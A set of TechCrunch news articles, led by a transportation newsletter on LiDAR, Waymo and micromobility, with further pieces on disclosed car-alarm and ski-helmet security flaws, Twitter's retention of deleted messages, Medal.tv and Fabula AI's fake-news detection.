Transportation Weekly: Waymo unleashes laser bear, Bird spreads its wings, Lyft tightens its belt

Welcome back to Transportation Weekly; I’m your host Kirsten Korosec, senior transportation reporter at TechCrunch . This is the fifth edition of our newsletter and we love the reader feedback. Keep it coming.

Never heard of TechCrunch’s Transportation Weekly? Catch up here, here and here. As I’ve written before, consider this a soft launch. Follow me on Twitter @kirstenkorosec to ensure you see it each week. (An email subscription is coming). 

This week, we explore the world of light detection and ranging sensors known as LiDAR, young drivers, trouble in Barcelona, autonomous trucks in California, and China among other things.


ONM …

There are OEMs in the automotive world. And here, (wait for it) there are ONMs — original news manufacturers. (Cymbal clash!) This is where investigative reporting, enterprise pieces and analysis on transportation lives.

This week, we’re going to put our on analysis hats as we explore the world of LiDAR, a sensor that measures distance using laser light to generate highly accurate 3D maps of the world around the car. LiDAR is considered by most in the self-driving car industry (Tesla CEO Elon Musk being one exception) a key piece of technology required to safely deploy robotaxis and other autonomous vehicles.

There are A LOT of companies working on LiDAR. Some counts track upwards of 70. For years now, Velodyne has been the primary supplier of LiDAR sensors to companies developing autonomous vehicles. Waymo, back when it was just the Google self-driving project, even used Velodyne LiDAR sensors until 2012.

Dozens of startups have sprung up with Velodyne in its sights. But now Waymo has changed the storyline.

To catch you up: Waymo announced this week that it will start selling its custom LiDAR sensors — the technology that was at the heart of a trade secrets lawsuit last year against Uber.

Waymo’s entry into the market doesn’t necessarily upend other companies’ plans. Waymo is going to sell its short range LiDAR, called Laser Bear Honeycomb, to companies outside of self-driving cars. It will initially target robotics, security and agricultural technology.

It does put pressure on startups, particularly those with less capital or those targeting the same customer base. Pitchbook ran the numbers for us to determine where the LiDAR industry sits at the moment. There are two stories here: there are a handful of well capitalized startups and we may have reached “peak” LiDAR. Last year, there were 28 VC deals in LiDAR technology valued at $650 million. The number of deals was slightly lower than in 2017, but the values jumped by nearly 34 percent.

The top global VC-backed LiDAR technology companies (by post valuation) are Quanergy, Velodyne (although mostly corporate backed), Aurora (not self-driving company Aurora Innovation), Ouster, and DroneDeploy. The graphic below, also courtesy of Pitchbook, shows the latest figures as of January 31, 2019.

Dig In

Researchers discovered that two popular car alarm systems were vulnerable to a manipulated server-side API that could be abused to take control of an alarm system’s user account and their vehicle.

The companies — Russian alarm maker Pandora and California-based Viper (or Clifford in the U.K.) — have fixed the  security vulnerabilities that allowed researchers to remotely track, hijack and take control of vehicles with the alarms installed. What does this all mean?

Our in-house security expert and reporter Zack Whittaker digs in and gives us a reality check. Follow him @zackwhittaker.

Since the first widely publicized car hack in 2015 proved hijacking and controlling a car was possible, it’s opened the door to understanding the wider threat to modern vehicles.

Most modern cars have internet connectivity, making their baseline surface area of attack far greater than a car that doesn’t. But the effort that goes into remotely controlling a vehicle is difficult and convoluted, and the attack — often done by chaining together a set of different vulnerabilities — can take weeks or even longer to develop.

Keyfob or replay attacks are far more likely than say remote attacks over the internet or cell network. A keyfob sends an “unlock” signal, a device captures that signal and replays it. By replaying it you can unlock the car.

This latest car hack, featuring flawed third-party car alarms, was far easier to exploit, because the alarm systems added a weakness to the vehicles that weren’t there to begin with. Car makers, with vast financial and research resources, do a far greater job at securing their vehicle than the small companies that focus on functionality over security. For now, the bigger risk comes from third parties in the automobile space, but the car makers can’t afford to drop their game either.


A little bird …

We hear a lot. But we’re not selfish. Let’s share.

blinky-cat-bird

The California Department Motor Vehicles is the government body that regulates autonomous vehicle testing on public roads. The job of enforcement falls to the California Highway Patrol.

In an effort to gauge the need for more robust testing guidelines, the California Highway Patrol decided to hold an event at its headquarters in Sacramento. Eight companies working on autonomous trucking technology were invited. It was supposed to be a large event with local and state politicians in attendance. And it was supposed to validate autonomous trucking as an emerging industry.

There’s just one problem: only one AV trucking company is willing and able to complete this course. We hear that this AV startup actually already went ahead and completed the test course.

The California Highway Patrol has postponed event, for now, presumably until more companies can join.

Got a tip or overheard something in the world of transportation? Email me or send a direct message to @kirstenkorosec.


Deal of the week

Instead of highlighting one giant deal, let’s step back and take a broader view of mobility this week. The upshot: 2018 saw a decline in total investments in the sector and money moved away from ride-hailing and towards two-wheeled transportation.

According to new research from EY, mobility investments in 2018 reached $39.1 billion, down from $55.2 billion in the previous year. (The figures EY provided was through November 2018).

Ride-hailing companies raised $7.1 billion in 2018, a 73 percent decline from the previous year when $26.7 billion poured into this sector.

Investors, it seems, are shifting their focus to other business models, notably first and last-mile connectivity. EY estimates $7 billion was invested in two-wheeler mobility companies such as bike-sharing and electric scooters in 2018. The U.S. and China together have contributed to more than 80 percent of overall two-wheeler mobility investments this year alone, according to EY research shared with TechCrunch.

Other deals:


Snapshot

Let’s talk about Generation Z, that group of young people born 1996 to the present, and one startup that is focused on turning that demographic into car owners.

There’s lots of talk and hand wringing about young people choosing not to get a driver’s license, or not buying a vehicle. In the UK, for instance, about 42 percent of young drivers aged 17 to 24, hold a driver’s license. That’s about 2.7 million people, according to the National Travel Survey 2018 (NTS) of the UK government’s department of transport. An additional 2.2 million have a provisional or learner license. Combined, that amounts to about 13 percent of the car driving population of the UK.

In the UK, evidence suggests that a rise in motoring costs have discouraged young people from learning. And there lies one opportunity that a new startup called Driver1 is targeting.

Driver 1 is a car subscription service designed exclusively for first car drivers aged 17 to 24. The company has been in stealth mode for about a year and is just now launching.

“The young driver market is being underserved by the car industry, Driver1 founder Tim Hammond told TechCrunch. “And primarily it’s the financing that’s not available for that age group. It’s also something that’s not really affordable for any of the car subscription models like Fair.com and it’s not suitable for the OEM subscription services either financially or from an age perspective for young drivers.”

The company’s own research has found this group wants a newer car for 12 to 15 months.

“The car is the extension of their device,” Hammond said, noting these drivers don’t want the old junkers. “They want their iPhones and they want the car that goes with it.”

The company is working directly with leasing companies — not dealerships — to provide young drivers with 3 to 5-year-old cars that have lost 60 percent or so of their value. Driver1 is targeting under $120 a month for the customer and has a partnership with remarketing company Manheim, which is owned by Cox Automotive.

The startup is focused on the UK for now and has about 600 members who have reserved their cars for purchase. Driver1 is aiming to capture about 10 percent of the 1 million or so young people in the UK who pass their learners permit each year. The company plans it expand to France and other European countries in the fall.


Tiny but mighty micromobility

Bird Rocking Out GIF - Find & Share on GIPHY

Ca-caw, ca-caw! That’s the sound of Bird gearing up to launch Bird Platform in New Zealand, Canada and Latin America in the coming weeks. The platform is part of Bird’s mission to bring its scooters across the world “and empower local entrepreneurs in regions where we weren’t planning to launch to run their own electric-scooter sharing program with Bird’s tech and vehicles,” Bird CEO Travis VanderZanden told TechCrunch.

MRD’s two cents: Bird Platform seems like a way for Bird to make extra cash without having to do any of the work i.e. charging the vehicles, maintaining them and working with city officials to get permits. Smart!

Meanwhile, the dolla dolla bills keep pouring into micromobility. European electric scooter startup Voi Technology raised an additional $30 million in capital. That was on top of a $50 million Series A round just three months ago.

Oh, and because micromobility isn’t just for startups, Volkswagen decided to launch a kind of weird-looking electric scooter in Geneva. Because, why not?

Megan Rose Dickey

One more thing …

Lyft is trimming staff to prepare for its IPO. TechCrunch’s Ingrid Lunden learned that the company has laid off about 50 staff in its bike and scooter division. It appears most of these folks are people who joined the Lyft through its acquisition of  electric bike sharing startup Motivate a deal that closed about three months ago.


Notable reads

It’s probably not smart to suggest another newsletter, but if you haven’t checked out Michael Dunne’s  The Chinese Are Coming newsletter, you should. Dunne has a unique perspective on what’s happening in China, particularly as it related to automotive and newer forms of mobility such as ride-hailing. One interesting nugget from his latest edition: there are more than 20 other new electric vehicle makers in China.

“Most will fall away within the next 3 to 4 years as cash runs out,” Dunne predicts.

Other quotable notables:

Here’s a fun read for the week. TechCrunch’s Lucas Matney wrote about a YC Combinator startup Jetpack Aviation.The startup has launched pre-orders this week for the moonshot of moonshots, the Speeder, a personal vertical take-off and landing vehicle with a svelte concept design that looks straight out of Star Wars or Halo.


Testing and deployments

Spanish ride-hailing firm Cabify is back operating in Barcelona, Spain despite issuing dire warnings that new regulations issued by local government would crush its business and force it to fire thousands of drivers and leave forever. Turns out forever is one month.

The Catalan Generalitat issued a decree last month imposing a wait time of at least 15 minutes between a booking being made and a passenger being picked up. The policy was made to ensure taxis and ride-hailing firms are not competing for the same passengers, following a series of taxi strikes, which included scenes of violence. Our boots on the ground reporter Natasha Lomas has the whole story.

Sure, Barcelona is just one city. But what happened in Barcelona isn’t an isolated incident. The early struggles between conventional taxis and ride-hailing operations might be over, but that doesn’t mean the matter has been settled altogether.

And it’s not likely to go away. Once, robotaxis actually hit the road en masse — and yes, that’ll be awhile — these same struggles will pop up again.

Other deployments, or, er, retreats ….

Bike share pioneer Mobike retreats to China

On the autonomous vehicle front:

China Post, the official postal service of China, and delivery and logistics companies Deppon Express, will begin autonomous package delivery services in April. The delivery trucks will operate on autonomous driving technologies developed by FABU Technology, an AI company focused on intelligent driving systems.


On our radar

There is a lot of transportation-related activity this month. Come find me.

SXSW in Austin: TechCrunch will be at SXSW. And there is a lot of mobility action here. Aurora CEO and co-founder Chris Urmson was on stage Saturday morning with Malcolm Gladwell. Mayors from a number of U.S. cities as well as companies like Ford and Mercedes are on the scene. Here’s where I’ll be. 

  • 2 p.m. to 6:30 p.m. (local time) March 9 at the Empire Garage for the Smart Mobility Summit, an annual event put on by Wards Intelligence and C3 Group. The Autonocast, the podcast I co-host with Alex Roy and Ed Niedermeyer, will also be on hand.
  • 9:30 a.m. to 10:30 a.m. (local time) March 12 at the JW Marriott. The Autonocast and founding general partner of Trucks VC, Reilly Brennan will hold a SXSW podcast panel on automated vehicle terminology and other stuff.
  • 3:30 p.m (local time) over at the Hilton Austin Downtown, I’ll be moderating a panel Re-inventing the Wheel: Own, Rent, Share, Subscribe. Sherrill Kaplan with Zipcar, Amber Quist, with Silvercar and Russell Lemmer with Dealerware will join me on stage.
  • TechCrunch is also hosting a SXSW party from 1 pm to 4 pm Sunday, March 10, 615 Red River St., that will feature musical guest Elderbrook. RSVP here

Nvidia GTC

TechCrunch (including yours truly) will also be at Nvidia’s annual GPU Technology Conference from March 18 to 21 in San Jose.

Self Racing Cars

The annual Self Racing Car event will be held March 23 and March 24 at Thunderhill Raceway near Willows, California.

There is still room for participants to test or demo their autonomous vehicles, drive train innovation, simulation, software, teleoperation, and sensors. Hobbyists are welcome. Sign up to participate or drop them a line at [email protected].

Thanks for reading. There might be content you like or something you hate. Feel free to reach out to me at [email protected] to share those thoughts, opinions or tips. 

Nos vemos la próxima vez.

Car alarms with security flaws put 3 million vehicles at risk of hijack

Two popular car alarm systems have fixed security vulnerabilities that allowed researchers to remotely track, hijack and take control of vehicles with the alarms installed.

The systems, built by Russian alarm maker Pandora and California-based Viper — or Clifford in the U.K., were vulnerable to an easily manipulated server-side API, according to researchers at Pen Test Partners, a U.K. cybersecurity company. In their findings, the API could be abused to take control of an alarm system’s user account — and their vehicle.

It’s because the vulnerable alarm systems could be tricked into resetting an account password because the API was failing to check if it was an authorized request, allowing the researchers to log in.

Although the researchers bought alarms to test, they said “anyone” could create a user account to access any genuine account or extract all the companies’ user data.

The researchers said some three million cars globally were vulnerable to the flaws, since fixed.

In one example demonstrating the hack, the researchers geolocated a target vehicle, track it in real-time, follow it, remotely kill the engine and force the car to stop, and unlock the doors. The researchers said it was “trivially easy” to hijack a vulnerable vehicle. Worse, it was possible to identify some car models, making targeted hijacks or high-end vehicles even easier.

According to their findings, the researchers also found they could listen in on the in-car microphone, built-in as part of the Pandora alarm system for making calls to the emergency services or roadside assistance.

Ken Munro, founder of Pen Test Partners, told TechCrunch this was their “biggest” project.

The researchers contacted both Pandora and Viper with a seven-day disclosure period, given the severity of the vulnerabilities. Both companies responded quickly to fix the flaws.

When reached, Viper’s Chris Pearson confirmed the vulnerability has been fixed. “If used for malicious purposes, [the flaw] could allow customer’s accounts to be accessed without authorization.”

Viper blamed a recent system update by a service provider for the bug and said the issue was “quickly rectified.”

“Directed believes that no customer data was exposed and that no accounts were accessed without authorization during the short period this vulnerability existed,” said Pearson, but provided no evidence to how the company came to that conclusion.

In a lengthy email, Pandora’s Antony Noto challenged several of the researcher’s findings, summated: “The system’s encryption was not cracked, the remotes where not hacked, [and] the tags were not cloned,” he said. “A software glitch allowed temporary access to the device for a short period of time, which has now been addressed.”

The research follows work last year by Vangelis Stykas on the Calamp, a telematics provider that serves as the basis for Viper’s mobile app. Stykas, who later joined Pen Test Partners and also worked on the car alarm project, found the app was using credentials hardcoded in the app to login to a central database, which gave anyone who logged in remote control of a connected vehicle.

The gaming clips service, Medal has bought Donate Bot for direct donations, and payments

The Los Angeles-based video gaming clipping service, Medal, has made its first acquisition as it rolls out new features to its user base.

The company has acquired the Discord -based donations and payments service Donate Bot to enable direct payments and other types of transactions directly on its site.

Now, the company is rolling out a service to any Medal user with more than 100 followers, allowing them to accept donations, subscriptions, and payments directly from their clips on mobile, web, desktop and through embedded clips, according to a blog post from company founder Pim De Witte.

For now, and for at least the next year, the service will be free to Medal users — meaning the company won’t take a dime of any users’ revenue made through payments on the platform.

For users who already have a storefront up with Patreon, Shopify, Paypal.me, Streamlabs, or ko-fi, Medal won’t wreck the channel — integrating with those and other payment processing systems.

Through the Donate Bot service any user with a discord server can generate a donation link, which can be customized to become more of a customer acquisition funnel for teams or gamers that sell their own merchandise.

Webhooks API gives users a way to add donors to various list or subscription services or stream overlays and the Donate Bot is directly linked with Discord Bot List and Discord Server List as well, so you can accept donations without having to set up a website.

In addition, the company updated its social features, so clips made on Medal can ultimately be shared on social media platforms like Twitter and Discord — and the company is also integrated with Discord, Twitter and Steam in a way to encourage easier sign ups.

Outdoor Tech’s Chips ski helmet speakers are a hot mess of security flaws

Sometimes the “smartest” gadgets come with the shoddiest security.

Alan Monie, a security researcher at U.K. cybersecurity firm Pen Test Partners, bought and tested a pair of Chips 2.0 wireless speakers, built by California-based Outdoor Tech, only to find they’re a security nightmare.

The in-helmet speakers allow users to listen to music on the go, make calls and talk to friends through the walkie-talkie — all without having to take off their helmet. The speakers are connected to an app on your phone.

You’re probably thinking: how bad can the security be on a simple-enough ski-helmet speakers?

According to Monie, who wrote up his findings, it’s easy to grab streams of data from the server-side API, used to communicate with the app, such as usernames, email addresses and phone numbers of anyone with an account. Monie said the API returned scrambled passwords, but that password reset codes were sent in plaintext.

Worse, it’s possible to reveal a user’s precise geolocation, and listen in on anyone’s real-time walkie-talkie conversations.

The only thing worse than the security flaws are the company’s lack of response when Monie reached out to get the issues fixed. After a short email exchange over several days, the company stopped responding, he said.

“We really like the product but its security is sorely lacking,” said Monie in his report.

It’s the latest example of many where gadget makers take little to no responsibility for the security of their hardware or software. With so many devices connected to the internet — either directly or through an app — every company has to think like a security company.

Outdoor Tech did not return a request for comment.

Amazon stops selling stick-on Dash buttons

Amazon has confirmed it’s retired physical stick-on Dash buttons from sale — in favor of virtual alternatives that let Prime Members tap a digital button to reorder a staple product.

It also points to its Dash Replenishment service — which offers an API for device makers wanting to build Internet connected appliances that can automatically reorder the products they need to function — be it cat food, batteries or washing power — as another reason why physical Dash buttons, which launched back in 2015 (costing $5 a pop), are past their sell by date.

Amazon says “hundreds” of IoT devices capable of self-ordering on Amazon have been launched globally to date by brands including Beko, Epson, illy, Samsung and Whirlpool, to name a few.

So why press a physical button when a digital one will do? Or, indeed, why not do away with the need to push a button all and just let your gadgets rack up your grocery bill all by themselves while you get on with the importance business of consuming all the stuff they’re ordering?

You can see where Amazon wants to get to with its “so customers don’t have to think at all about restocking” line. Consumption that entirely removes the consumer’s decision making process from the transactional loop is quite the capitalist wet dream. Though the company does need to be careful about consumer protection rules as it seeks to remove all friction from the buying process.

The ecommerce behemoth also claims customers are “increasingly” using its Alexa voice assistant to reorder staples, such as via the Alexa Shopping voice shopping app (Amazon calls it ‘hands free shopping’) that lets people inform the machine about a purchase intent and it will suggest items to buy based on their Amazon order history.

Albeit, it offers no actual usage metrics for Alexa Shopping. So that’s meaningless PR.

A less flashy but perhaps more popular option than ‘hands free shopping’, which Amazon also says has contributed to making physical Dash buttons redundant, is its Subscribe & Save program.

This “lets customers automatically receive their favourite items every month”, as Amazon puts it. It offers an added incentive of discounts that kick in if the user signs up to buy five or more products per month. But the mainstay of the sales pitch is convenience with Amazon touting time saved by subscribing to ‘essentials’ — and time saved from compiling boring shopping lists once again means more time to consume the stuff being bought on Amazon…

In a statement about retiring physical Dash buttons from global sale on February 28, Amazon also confirmed it will continue to support existing Dash owners — presumably until their buttons wear down to the bare circuit board from repeat use.

“Existing Dash Button customers can continue to use their Dash Button devices,” it writes. “We look forward to continuing support for our customers’ shopping needs, including growing our Dash Replenishment product line-up and expanding availability of virtual Dash Buttons.”

So farewell then clunky Dash buttons. Another physical push-button bites the dust. Though plastic-y Dash were quite unlike the classic iPhone home button — always seeming temporary and experimental rather than slick and coolly reassuring. Even so, the end of both buttons points to the need for tech businesses to tool up for the next wave of contextually savvy connected devices. More smarts, and more controllable smarts is key.

Amazon’s statement about ‘shifting focus’ for Dash does not mention potential legal risks around the buttons related to consumer rights challenges — but that’s another angle here.

In January a court in Germany ruled Dash buttons breached local ecommerce rules, following a challenge by a regional consumer watchdog that raised concerns about T&Cs which allow Amazon to substitute a product of a higher price or even a different product entirely than what the consumer had originally selected. The watchdog argued consumers should be provided with more information about price and product before taking the order — and the judges agreed. Though Amazon said it would seek to appeal.

While it’s not clear whether or not that legal challenge contributed to Amazon’s decision to shutter Dash, it’s clear that virtual Dash buttons offer more opportunities for displaying additional information prior to a purchase than a screen-less physical Dash button. So are more easily adapted to meet any tightening legal requirements across different markets.

The demise of the physical Dash was reported earlier by CNET.

Polis, the door-to-door marketer, raises another $2.5 million

Polis founder Kendall Tucker began her professional life as a campaign organizer in local Democratic politics, but — seeing an opportunity in her one-on-one conversations with everyday folks — has built a business taking that shoe leather approach to political campaigns to the business world.

Now the company she founded to test her thesis that Americans would welcome back the return of the door-to-door salesperson three years ago, is $2.5 million richer thanks to a new round of financing from Initialized Capital (the fund founded by Garry Tan and Reddit co-founder Alexis Ohanian) and Semil Shah’s Haystack.vc.

The Boston-based company currently straddles the line between political organizing tool and new marketing platform — a situation that even its founder admits is tenuous at the moment.

That tension is only exacerbated by the fact that the company is coming off one of its biggest political campaign seasons. Helping to power the get-out-the-vote initiative for Senatorial candidate Beto O’Rourke in Texas, Polis’ software managed the campaign’s outreach effort to 3 million voters across the state.

However, politically-focused software and services businesses are risky. Earlier this year the Sean Parker-backed Brigade shut down and there are rumblings that other startups targeting political action may follow suit.

“Essentially, we got really excited about going into the corporate space because online has gotten so nasty,” says Tucker. “And, at the end of the day, digital advertising isn’t as effective as it once was.”

Customer acquisition costs in the digital ad space are rising. For companies like NRG Energy and Inspire Energy (both Polis clients), the cost of acquisitions online can be as much as $300.

Polis helps identify which doors for salespeople to target and works with companies to identify the scripts that are most persuasive for consumers, according to Tucker. The company also monitors for sales success and helps manage the process so customers aren’t getting too many housecalls from persistent sales people.

“We do everything through the conversation at the door,” says Tucker. “We do targeting and we do script curation (everything from what scrpt do you use and when do you branch out of scripts) and we ahve an open api so they can push that out and they run with it through the rest of their marketing.”

 

Medal.tv’s clipping service allows gamers to share the moments of their digital lives

As online gaming becomes the new social forum for living out virtual lives, a new startup called Medal.tv has raised $3.5 million for its in-game clipping service to capture and share the Kodak moments and digital memories that are increasingly happening in places like Fortnite or Apex Legends.

Digital worlds like Fortnite are now far more than just a massively multiplayer gaming space. They’re places where communities form, where social conversations happen, and where, increasingly, people are spending the bulk of their time online. They even host concerts — like the one from EDM artist, Marshmello, which drew (according to the DJ himself) roughly 10 million players onto the platform.

While several services exist to provide clips of live streams from gamers who broadcast on platforms like Twitch, Medal.tv bills itself as the first to offer clipping services for the private games that more casual gamers play among friends and far flung strangers around the world.

“Essentially the next generation is spending the same time inside games that we used to playing sports outside and things like that,” says Medal.tv’s co-founder and chief executive, Pim DeWitte. “It’s not possible to tell how far it will go. People will capture as many if not more moments for the reason that it’s simpler.”

The company marks a return to the world of gaming for DeWitte, a serial entrepreneur who first started coding when he was 13 years old.

Hailing from a small town in the Netherlands called Nijmegen, DeWitte first reaped the rewards of startup success with a gaming company called SoulSplit. Built on the back of his popular YouTube channel the SoulSplit game was launched with DeWitte’s childhood friend, Iggy Harmsen, and a fellow online gamer, Josh Lipson who came on board as SoulSplit’s chief technology officer.

At its height, Soulsplit was bringing in $1 million in revenue and employed roughly 30 people, according to interviews with DeWitte.

The company shut down in 2015 and the co-founders split up to pursue other projects. For DeWitte that meant a stint working with Doctors Without Borders on an app called MapSwipe that would use satellite imagery to better locate people in the event of a humanitarian crisis. He also helped the non-profit develop a tablet that could be used by doctors deployed to treat Ebola outbreaks.

Then in 2017, as social gaming was becoming more popular on games like Fortnite, DeWitte and his co-founders returned to the industry to launch Medal .tv.

It initially started as a marketing tool to get people interested in playing the games that DeWitte and his co-founders were hoping to develop. But as the clipping service took off, DeWitte and co. realized that they potentially had a more interesting social service on their hands.

“We were going to build a mobile app and were going to load a bunch of videos of people playing games and then we’re going to load videos of our games,” DeWitte says. 

The service allows users to capture the last 15 seconds of gameplay using different recording mechanisms based on game type. Medal.tv captures gameplay on a device and users can opt-in to record sound as well.

It is programmed so that it only records the game,” DeWitte says. “There is no inbound connection. It only calls for the API [and] all of the things that would be somewhat dangerous from a privacy perspective are all opt-in.”

 

There are roughly 30,000 users on the platform every week and around 15,000 daily active users, according to DeWitte. Launched last May, the company has been growing between 5% and 10% weekly, according to DeWitte. Typically, users are sharing clips through Discord, WhatsApp and Instagram direct messages, DeWitte said.

In addition to the consumer-facing clipping service, Medal also offers a data collection service that aggregates information about the clips that are shared by Medal’s users so game developers and streamers can get a sense of how clips are being shared across what platform.

“We look at clips as a form of communication and in most activity that we see, that’s how it’s being used,” says DeWitte.

But that information is also valuable to esports organizations to determine where they need to allocate new resources.

“Medal.tv Metrics is spectacular,” said Peter Levin, Chairman of the Immortals esports organization, in a statement. “With it, any gaming organization gains clear, actionable insights into the organic reach of their content, and can build a roadmap to increase it in a measurable way.”

The activity that Medal was seeing was impressive enough to attract the attention of investors led by Backed VC and Initial Capital. Ridge Ventures, Makers Fund, and Social Starts, all participated in the company’s $3.5 million round as well, with Alex Brunicki, a founding partner at Backed, and Matteo Vallone, principal at Initial, joining the company’s board.

“Emerging generations are experiencing moments inside games the same way we used to with sports and festivals growing up. Digital and physical identity are merging and the technology for gamers hasn’t evolved to support that.” said Alex Brunicki, partner at Backed.vc, in a statement.

Medal’s platform works with games like Apex Legends, Fortnite, Roblox, Minecraft and Oldschool Runescape (where DeWitte first cut his teeth in gaming).

“Friends are the main driver of game discovery, and game developers benefit from shareable games as a result. Medal.tv is trying to enable that without the complexity of streaming” said Vallone, who previously headed up games for Google Play Europe, and now sits on the Medal board. 

 

Even years later, Twitter doesn’t delete your direct messages

When does “delete” really mean delete? Not always or even at all if you’re Twitter .

Twitter retains direct messages for years, including messages you and others have deleted, but also data sent to and from accounts that have been deactivated and suspended, according to security researcher Karan Saini.

Saini found years-old messages found in a file from an archive of his data obtained through the website from accounts that were no longer on Twitter. He also filed a similar bug, found a year earlier but not disclosed until now, that allowed him to use a since-deprecated API to retrieve direct messages even after a message was deleted from both the sender and the recipient — though, the bug wasn’t able to retrieve messages from suspended accounts.

Saini told TechCrunch that he had “concerns” that the data was retained by Twitter for so long.

Direct messages once let users to “unsend” messages from someone else’s inbox, simply by deleting it from their own. Twitter changed this years ago, and now only allows a user to delete messages from their account. “Others in the conversation will still be able to see direct messages or conversations that you have deleted,” Twitter says in a help page. Twitter also says in its privacy policy that anyone wanting to leave the service can have their account “deactivated and then deleted.” After a 30-day grace period, the account disappears and along with its data.

But, in our tests, we could recover direct messages from years ago — including old messages that had since been lost to suspended or deleted accounts. By downloading your account’s data, it’s possible to download all of the data Twitter stores on you.

A conversation, dated March 2016, with a suspended Twitter account was still retrievable today. (Image: TechCrunch

Saini says this is a “functional bug” rather than a security flaw, but argued that the bug allows anyone a “clear bypass” of Twitter mechanisms to prevent accessed to suspended or deactivated accounts.

But it’s also a privacy matter, and a reminder that “delete” doesn’t mean delete — especially with your direct messages. That can open up users, particularly high-risk accounts like journalist and activists, to government data demands that call for data from years earlier.

That’s despite Twitter’s claim that once an account has been deactivated, there is “a very brief period in which we may be able to access account information, including tweets,” to law enforcement.

A Twitter spokesperson said the company was “looking into this further to ensure we have considered the entire scope of the issue.”

Retaining direct messages for years may put the company in a legal grey area ground amid Europe’s new data protection laws, which allows users to demand that a company deletes their data.

Neil Brown, a telecoms, tech and internet lawyer at U.K. law firm Decoded Legal, said there’s “no formality at all” to how a user can ask for their data to be deleted. Any request from a user to delete their data that’s directly communicated to the company “is a valid exercise” of a user’s rights, he said.

Companies can be fined up to four percent of their annual turnover for violating GDPR rules.

“A delete button is perhaps a different matter, as it is not obvious that ‘delete’ means the same as ‘exercise my right of erasure’,” said Brown. Given that there’s no case law yet under the new General Data Protection Regulation regime, it will be up to the courts to decide, he said.

When asked if Twitter thinks that consent to retain direct messages is withdrawn when a message or account is deleted, Twitter’s spokesperson had “nothing further” to add.

Fabula AI is using social spread to spot ‘fake news’

UK startup Fabula AI reckons it’s devised a way for artificial intelligence to help user generated content platforms get on top of the disinformation crisis that keeps rocking the world of social media with antisocial scandals.

Even Facebook’s Mark Zuckerberg has sounded a cautious note about AI technology’s capability to meet the complex, contextual, messy and inherently human challenge of correctly understanding every missive a social media user might send, well-intentioned or its nasty flip-side.

“It will take many years to fully develop these systems,” the Facebook founder wrote two years ago, in an open letter discussing the scale of the challenge of moderating content on platforms thick with billions of users. “This is technically difficult as it requires building AI that can read and understand news.”

But what if AI doesn’t need to read and understand news in order to detect whether it’s true or false?

Step forward Fabula, which has patented what it dubs a “new class” of machine learning algorithms to detect “fake news” — in the emergent field of “Geometric Deep Learning”; where the datasets to be studied are so large and complex that traditional machine learning techniques struggle to find purchase on this ‘non-Euclidean’ space.

The startup says its deep learning algorithms are, by contrast, capable of learning patterns on complex, distributed data sets like social networks. So it’s billing its technology as a breakthrough. (Its written a paper on the approach which can be downloaded here.)

It is, rather unfortunately, using the populist and now frowned upon badge “fake news” in its PR. But it says it’s intending this fuzzy umbrella to refer to both disinformation and misinformation. Which means maliciously minded and unintentional fakes. Or, to put it another way, a photoshopped fake photo or a genuine image spread in the wrong context.

The approach it’s taking to detecting disinformation relies not on algorithms parsing news content to try to identify malicious nonsense but instead looks at how such stuff spreads on social networks — and also therefore who is spreading it.

There are characteristic patterns to how ‘fake news’ spreads vs the genuine article, says Fabula co-founder and chief scientist, Michael Bronstein.

“We look at the way that the news spreads on the social network. And there is — I would say — a mounting amount of evidence that shows that fake news and real news spread differently,” he tells TechCrunch, pointing to a recent major study by MIT academics which found ‘fake news’ spreads differently vs bona fide content on Twitter.

“The essence of geometric deep learning is it can work with network-structured data. So here we can incorporate heterogenous data such as user characteristics; the social network interactions between users; the spread of the news itself; so many features that otherwise would be impossible to deal with under machine learning techniques,” he continues.

Bronstein, who is also a professor at Imperial College London, with a chair in machine learning and pattern recognition, likens the phenomenon Fabula’s machine learning classifier has learnt to spot to the way infectious disease spreads through a population.

“This is of course a very simplified model of how a disease spreads on the network. In this case network models relations or interactions between people. So in a sense you can think of news in this way,” he suggests. “There is evidence of polarization, there is evidence of confirmation bias. So, basically, there are what is called echo chambers that are formed in a social network that favor these behaviours.”

“We didn’t really go into — let’s say — the sociological or the psychological factors that probably explain why this happens. But there is some research that shows that fake news is akin to epidemics.”

The tl;dr of the MIT study, which examined a decade’s worth of tweets, was that not only does the truth spread slower but also that human beings themselves are implicated in accelerating disinformation. (So, yes, actual human beings are the problem.) Ergo, it’s not all bots doing all the heavy lifting of amplifying junk online.

The silver lining of what appears to be an unfortunate quirk of human nature is that a penchant for spreading nonsense may ultimately help give the stuff away — making a scalable AI-based tool for detecting ‘BS’ potentially not such a crazy pipe-dream.

Although, to be clear, Fabula’s AI remains in development at this stage, having been tested internally on Twitter data sub-sets at this stage. And the claims it’s making for its prototype model remain to be commercially tested with customers in the wild using the tech across different social platforms.

It’s hoping to get there this year, though, and intends to offer an API for platforms and publishers towards the end of this year. The AI classifier is intended to run in near real-time on a social network or other content platform, identifying BS.

Fabula envisages its own role, as the company behind the tech, as that of an open, decentralised “truth-risk scoring platform” — akin to a credit referencing agency just related to content, not cash.

Scoring comes into it because the AI generates a score for classifying content based on how confident it is it’s looking at a piece of fake vs true news.

A visualisation of a fake vs real news distribution pattern; users who predominantly share fake news are coloured red and users who don’t share fake news at all are coloured blue — which Fabula says shows the clear separation into distinct groups, and “the immediately recognisable difference in spread pattern of dissemination”.

In its own tests Fabula says its algorithms were able to identify 93 percent of “fake news” within hours of dissemination — which Bronstein claims is “significantly higher” than any other published method for detecting ‘fake news’. (Their accuracy figure uses a standard aggregate measurement of machine learning classification model performance, called ROC AUC.)

The dataset the team used to train their model is a subset of Twitter’s network — comprised of around 250,000 users and containing around 2.5 million “edges” (aka social connections).

For their training dataset Fabula relied on true/fake labels attached to news stories by third party fact checking NGOs, including Snopes and PolitiFact. And, overall, pulling together the dataset was a process of “many months”, according to Bronstein, He also says that around a thousand different stories were used to train the model, adding that the team is confident the approach works on small social networks, as well as Facebook-sized mega-nets.

Asked whether he’s sure the model hasn’t been trained to identified patterns caused by bot-based junk news spreaders, he says the training dataset included some registered (and thus verified ‘true’) users.

“There is multiple research that shows that bots didn’t play a significant amount [of a role in spreading fake news] because the amount of it was just a few percent. And bots can be quite easily detected,” he also suggests, adding: “Usually it’s based on some connectivity analysis or content analysis. With our methods we can also detect bots easily.”

To further check the model, the team tested its performance over time by training it on historical data and then using a different split of test data.

“While we see some drop in performance it is not dramatic. So the model ages well, basically. Up to something like a year the model can still be applied without any re-training,” he notes, while also saying that, when applied in practice, the model would be continually updated as it keeps digesting (ingesting?) new stories and social media content.

